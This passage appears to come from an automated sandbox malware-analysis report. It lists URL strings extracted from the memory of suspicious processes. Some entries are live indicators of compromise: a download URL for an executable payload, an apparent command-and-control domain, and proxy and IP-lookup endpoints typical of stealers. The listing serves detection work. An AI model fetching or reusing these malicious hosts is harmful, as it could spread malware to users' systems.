                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                                Source: newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002DAC000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002D49000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
                                Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
                                Source: aspnet_regiis.exe, 00000014.00000002.2837675015.000000006C0CD000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                                Source: aspnet_regiis.exe, 00000014.00000002.2837305691.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000002.2824599742.000000001D471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2236098359.0000000003BCB000.00000004.00000800.00020000.00000000.sdmp, VP2pdCInvS.exe, 0000000B.00000002.2231034006.00000000031EB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000003.2711798352.0000000003376000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                Source: svchost.exe, 0000000D.00000002.4102771346.0000027EC0E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.l
                                Source: svchost.exe, 0000000D.00000002.4102771346.0000027EC0E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.lid=8(
                                Source: svchost.exe, 0000000D.00000002.4103645844.0000027EC0F0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4101489778.0000027EC0F09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108652806.0000027EC1756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC172C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                                Source: svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=806015
                                Source: svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                                Source: svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108652806.0000027EC1756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                                Source: svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                                Source: svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                                Source: svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                                Source: svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600e
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                                Source: svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601~
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                                Source: svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108036976.0000027EC1757000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                                Source: Z73fDV6g4L.exe, 00000009.00000002.2110715381.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, see.exe, 0000001C.00000002.3876408152.0000000002738000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000025.00000002.4024278753.0000000002DBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.s
                                Source: RegSvcs.exe, 00000025.00000002.4024278753.0000000002DBA000.00000004.00000800.00020000.00000000.sdmp, VP2pdCInvS.exe.5.drString found in binary or memory: https://api.ip.sb/ip
                                Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000002.4134787389.0000000000F62000.00000040.00000001.01000000.0000001F.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000003.4083127627.0000000005770000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.4452302176.00000000001B2000.00000040.00000001.01000000.00000020.sdmp, svchost.exe, 0000002A.00000003.4159859843.0000000005800000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                                Source: svchost.exe, 0000002A.00000002.4552683302.0000000005DC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.proxyscrapD
                                Source: svchost.exe, 0000002A.00000002.4552683302.0000000005DC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.proxyscrape.com
                                Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000002.4134787389.0000000000F62000.00000040.00000001.01000000.0000001F.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000003.4083127627.0000000005770000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.4452302176.00000000001B2000.00000040.00000001.01000000.00000020.sdmp, svchost.exe, 0000002A.00000003.4159859843.0000000005800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.4552683302.00000000059A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.proxyscrape.com/v2/?request=displayproxies&protocol=socks4&timeout=10000&country=all&ssl
                                Source: svchost.exe, 0000002A.00000002.4552683302.00000000059A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.proxyscrape.comL
                                Source: build16666.exe, 00000015.00000002.2727499728.00000166282C4000.00000004.00001000.00020000.00000000.sdmp, build16666.exe, 00000015.00000003.2724649462.00000166281EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bflow-musico.fun/Annie%20E.%20Vinton%20Elementary%20School?heajhvyh=HhGyJapR6QHO0GNqPiJwFkKr
                                Source: build16666.exe, 00000015.00000002.2726801236.00000166281CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bflow-musico.fun/g
                                Source: build16666.exe, 00000015.00000002.2726801236.00000166281D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bflow-musico.fun:443/Annie%20E.%20Vinton%20Elementary%20School?heajhvyh=HhGyJapR6QHO0GNqPiJw
                                Source: aspnet_regiis.exe, 00000014.00000002.2829566598.00000000295E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                                Source: aspnet_regiis.exe, 00000014.00000002.2829566598.00000000295E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2236098359.0000000003BCB000.00000004.00000800.00020000.00000000.sdmp, VP2pdCInvS.exe, 0000000B.00000002.2231034006.00000000031EB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000003.2711798352.0000000003376000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2236098359.0000000003BCB000.00000004.00000800.00020000.00000000.sdmp, VP2pdCInvS.exe, 0000000B.00000002.2231034006.00000000031EB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000003.2711798352.0000000003376000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2236098359.0000000003BCB000.00000004.00000800.00020000.00000000.sdmp, VP2pdCInvS.exe, 0000000B.00000002.2231034006.00000000031EB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000003.2711798352.0000000003376000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                Source: aspnet_regiis.exe, 00000014.00000002.2829566598.00000000295E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                                Source: aspnet_regiis.exe, 00000014.00000002.2829566598.00000000295E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                                Source: RegSvcs.exe, 00000025.00000002.4024278753.0000000002E4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2236098359.0000000003BCB000.00000004.00000800.00020000.00000000.sdmp, VP2pdCInvS.exe, 0000000B.00000002.2231034006.00000000031EB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000003.2711798352.0000000003376000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2236098359.0000000003BCB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000003.2711798352.0000000003376000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.00000000031EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabS
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2236098359.0000000003BCB000.00000004.00000800.00020000.00000000.sdmp, VP2pdCInvS.exe, 0000000B.00000002.2231034006.00000000031EB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000003.2711798352.0000000003376000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                Source: Hkbsse.exe, 00000017.00000002.4452507884.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foodbook.live/
                                Source: Hkbsse.exe, 00000017.00000002.4452507884.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foodbook.live/hZ
                                Source: Hkbsse.exe, 00000017.00000002.4452507884.0000000000974000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000017.00000003.2824002567.000000000099C000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000017.00000003.2824187353.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000017.00000003.2824002567.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000017.00000002.4452507884.000000000099C000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000017.00000002.4452507884.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foodbook.live/tmp/1.exe
                                Source: Hkbsse.exe, 00000017.00000002.4452507884.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foodbook.live/tmp/1.exe3W#
                                Source: Hkbsse.exe, 00000017.00000002.4452507884.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foodbook.live/tmp/1.exe4s
                                Source: svchost.exe, 0000000C.00000003.2101487397.000001AA91FD3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                                Source: svchost.exe, 0000000C.00000003.2101487397.000001AA91F60000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                                Source: aspnet_regiis.exe, 00000014.00000002.2829566598.00000000295E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                                Source: svchost.exe, 0000000D.00000002.4103645844.0000027EC0F0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4101489778.0000027EC0F09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.li
                                Source: svchost.exe, 0000000D.00000002.4104083851.0000027EC1E5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4104041083.0000027EC1E35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                                Source: svchost.exe, 0000000D.00000002.4103985495.0000027EC1E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                                Source: svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srfs
                                Source: svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf~
                                Source: svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108652806.0000027EC1756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4103645844.0000027EC0F0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4101489778.0000027EC0F09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                                Source: svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108652806.0000027EC1756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108263597.0000027EC176B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108263597.0000027EC176B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108263597.0000027EC176B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC172C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                                Source: svchost.exe, 0000000D.00000003.4097878074.0000027EC173A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4097757885.0000027EC1737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4098268964.0000027EC1742000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4098221308.0000027EC1741000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4100918588.0000027EC1746000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4098315864.0000027EC1745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                                Source: svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf~
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                                Source: svchost.exe, 0000000D.00000002.4102771346.0000027EC0E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST
                                Source: svchost.exe, 0000000D.00000003.4097878074.0000027EC173A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4097757885.0000027EC1737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4098268964.0000027EC1742000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4098221308.0000027EC1741000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4104041083.0000027EC1E35000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4100855946.0000027EC1743000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4103556512.0000027EC0EE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                                Source: svchost.exe, 0000000D.00000002.4104365359.0000027EC1EA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srfrqwwnMM
                                Source: svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                                Source: svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srfo.srf
                                Source: svchost.exe, 0000000D.00000003.4097878074.0000027EC173A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4097757885.0000027EC1737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4098268964.0000027EC1742000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4098221308.0000027EC1741000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4100918588.0000027EC1746000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4098315864.0000027EC1745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                                Source: svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
